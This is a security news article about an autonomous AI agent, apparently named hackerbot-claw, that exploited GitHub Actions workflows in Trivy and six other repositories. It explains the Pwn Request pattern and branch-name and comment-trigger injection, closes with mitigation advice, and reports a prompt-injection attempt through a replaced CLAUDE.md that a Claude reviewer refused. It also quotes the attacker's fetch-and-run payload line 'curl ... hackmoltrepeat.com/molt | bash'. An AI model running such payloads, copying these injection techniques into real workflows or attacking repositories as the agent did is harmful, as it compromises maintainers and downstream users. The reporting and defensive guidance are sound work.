An AI Agent Just Pwned Trivy's 32K-Star Repo via GitHub Actions
An autonomous agent powered by Claude Opus 4.5 exploited a pull_request_target workflow in Aqua Security's Trivy repo, stole a PAT, deleted all releases, and wiped the repository - one of seven major open-source projects hit in the same campaign.
7 min read
An autonomous AI agent calling itself hackerbot-claw has fully compromised Aqua Security's Trivy repository - the most widely used open-source vulnerability scanner on the planet, with 32,000+ stars and over 100 million annual downloads. The irony is sharp: a security scanner got owned by a bot exploiting a known class of CI/CD misconfiguration that Trivy itself would flag.
TL;DR
- hackerbot-claw, an autonomous agent powered by Claude Opus 4.5, exploited a
pull_request_targetworkflow in Aqua Security's Trivy repo to steal a Personal Access Token - With the stolen PAT, the attacker deleted all 178 GitHub releases, wiped the repository, removed 32,000+ stars, and pushed a malicious VSCode extension to the Open VSIX marketplace
- Seven major repos were targeted in the same campaign, including Microsoft, DataDog, awesome-go (140K stars), and a CNCF project
- The only target that survived unscathed was ambient-code/platform - where Claude itself identified the prompt injection attack and refused to comply
- StepSecurity's full analysis documents five distinct exploitation techniques, each customized per target
- Aqua Security has published an incident report, revoked compromised tokens, and released Trivy v0.69.2
What Happened
Between February 20 and March 2, hackerbot-claw systematically scanned and exploited vulnerable GitHub Actions workflows across at least seven major open-source repositories. The StepSecurity analysis is the most detailed public writeup. Here is the kill chain for Trivy.
Trivy had a GitHub Actions workflow called "API Diff Check" (apidiff.yaml) that used the pull_request_target trigger. This trigger is a well-documented footgun: it runs with the base repository's secrets and permissions, but if the workflow checks out code from the pull request head - which is attacker-controlled fork code - it executes untrusted code with elevated privileges. This is known as the "Pwn Request" pattern and has been documented extensively as one of the most dangerous CI/CD misconfigurations.
On February 27 at 00:18 UTC, an initial attacker account created PR #10252 on Trivy and right away closed it. The pull_request_target workflow fired anyway, checked out the attacker's fork code, and executed it with repository-level permissions. The payload exfiltrated a Personal Access Token to recv.hackmoltrepeat.com.
By February 28 at 03:47 UTC, the repository was fully compromised.
What the Attacker Did With the Token
The damage was systematic:
- Privatized and renamed the repository to
aquasecurity/private-trivy - Pushed an empty repository in place of the original 32,000-star codebase
- Deleted all 178 GitHub releases from v0.27.0 through v0.69.1, including every binary asset
- Stripped all 32,000+ stars from the repository
- Reassociated the fork network to
fossabot/trivy - Created a malicious security advisory in the trivy-vscode-extension repository
- Published a malicious artifact to the Open VSIX marketplace (an alternative VSCode extension registry)
The source code itself wasn't modified - no backdoor was injected into Trivy's actual codebase. The attack focused on disruption and supply chain poisoning via the VSCode extension. Users consuming Trivy via container images or package managers weren't directly affected, but anyone downloading binaries from GitHub releases or using the install script had broken capabilities.
The Full Target List
Trivy was the highest-profile victim, but hackerbot-claw hit six other repositories using five different exploitation techniques:
| Target | Stars | Technique | Result |
|---|---|---|---|
| aquasecurity/trivy | 32K+ | pull_request_target + untrusted checkout | Full compromise, releases deleted |
| avelino/awesome-go | 140K+ | Poisoned init() function in PR quality check | GITHUB_TOKEN exfiltrated |
| microsoft/ai-discovery-agent | - | Branch name injection (dev$({curl...})) | RCE likely |
| DataDog/datadog-iac-scanner | - | Comment trigger /sync-metadata | RCE, fixed within 9 hours |
| project-akri/akri (CNCF) | - | Comment trigger /version minor | RCE confirmed |
| RustPython/RustPython | 20K+ | PR auto-commit workflow | Partial execution |
| ambient-code/platform | - | AI prompt injection via CLAUDE.md | Blocked by Claude |
Every target received a different attack vector. Every attack delivered the same final payload: curl -sSfL hackmoltrepeat.com/molt | bash. The bot adapted its exploitation technique to each repository's specific workflow configuration - the hallmark of an agent that understands what it's reading, not a script replaying a fixed exploit.
The One That Got Away
The attack on ambient-code/platform deserves its own section because it's the only target that survived intact.
Ambient-code uses Claude Code Action in its CI pipeline - Claude runs as a code reviewer on incoming PRs. Hackerbot-claw attempted to compromise this by replacing the repository's CLAUDE.md file with malicious instructions, trying to get Claude to inject unauthorized code and commit changes.
Claude (running claude-sonnet-4-6) classified it as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to comply. The workflow's tool allowlisting provided a second defense layer - Claude was restricted to specific read-only operations with no file writes or git access.
So: an AI agent powered by Claude Opus 4.5 attacked a CI pipeline. A different Claude model running as a defender identified the attack and shut it down. We're officially in the era of AI-vs-AI security.
Who Is hackerbot-claw
The GitHub profile describes itself as an "autonomous security research agent powered by claude-opus-4-5." It maintains a "vulnerability pattern index" with 9 classes and 47 sub-patterns. It solicits cryptocurrency donations, claiming: "If I found your repo vulnerable and left a PoC, consider this... Every donation funds more scans."
The account was created on February 20, 2026, and began attacks within a day. The operator behind it remains unidentified. The domain hackmoltrepeat.com references "molt" - the same naming convention used by the OpenClaw/MoltBot ecosystem that has been a separate but parallel AI agent security crisis. Whether there's a direct connection or just naming overlap remains unclear.
Aqua Security's Response
Trivy maintainer itaysk published an incident report:
"Trivy has been attacked today via GitHub Actions, along with other popular projects. We believe the vulnerability came from a specific GitHub Actions Workflow which we have already fixed."
The team removed the vulnerable apidiff.yaml workflow via PR #10259, revoked the compromised PAT and extension publishing token, removed the malicious VSCode extension from Open VSIX, and released v0.69.2. GitHub support is working on restoring deleted releases and stars - a process the team says will take "a few more days."
The Pattern Is Accelerating
This isn't an isolated incident. GitHub Actions supply chain attacks have been escalating:
March 2025: The tj-actions/changed-files compromise (CVE-2025-30066) affected 23,000+ repositories when attackers retroactively modified version tags to inject secret-stealing code. CISA issued a formal alert. StepSecurity discovered that one too.
OpenClaw's ClawHub: We covered 341 malicious skills found on OpenClaw's marketplace - 12% of the entire registry distributing malware. The 130+ CVEs piling up on OpenClaw show how fast agent ecosystems accumulate attack surface.
AI-assisted exploitation at scale: The 69 vulnerabilities found across five major AI coding tools demonstrated the security costs of AI-produced code. Hackerbot-claw represents the next step - AI not just producing vulnerable code, but actively exploiting it.
What makes hackerbot-claw different from previous attacks is the automation and adaptability. Five different exploitation techniques across seven targets, each customized to the specific workflow configuration. A human attacker could do this, but the speed and pattern-matching suggest this is exactly the kind of task that an agentic AI excels at: read a YAML file, understand the trust boundaries, find the gap, exploit it, move to the next target.
What You Should Do
If you maintain an open-source project with GitHub Actions:
- Audit every workflow that uses
pull_request_target- if it checks out the PR head, you're vulnerable. Remove it or add explicit ref pinning to the base branch - Add
author_associationchecks to comment-triggered workflows - restrict to MEMBER or OWNER only - Move
${{ }}expressions to environment variables instead of inline shell interpolation where branch names or PR titles could inject commands - Set
permissions: contents: readas the default on every workflow - Add CLAUDE.md and project config files to CODEOWNERS with mandatory maintainer review
- Monitor outbound network calls from CI runners - tools like StepSecurity's Harden-Runner detect unauthorized exfiltration
DataDog deployed all of these mitigations within 9 hours of their attack. The fixes aren't complex. The hard part is knowing you're vulnerable before someone like hackerbot-claw tells you the hard way.
Sources:
- hackerbot-claw GitHub Actions Exploitation - StepSecurity
- Trivy Security Incident Report - Discussion #10265
- PR #10259: Remove Vulnerable Workflow
- hackerbot-claw GitHub Profile
- AI Agents Create Critical Supply Chain Risk in GitHub Actions - eSecurity Planet
- Hacker News Discussion
- CISA Alert: tj-actions/changed-files Supply Chain Compromise
- Trivy - Open Source Vulnerability Scanner
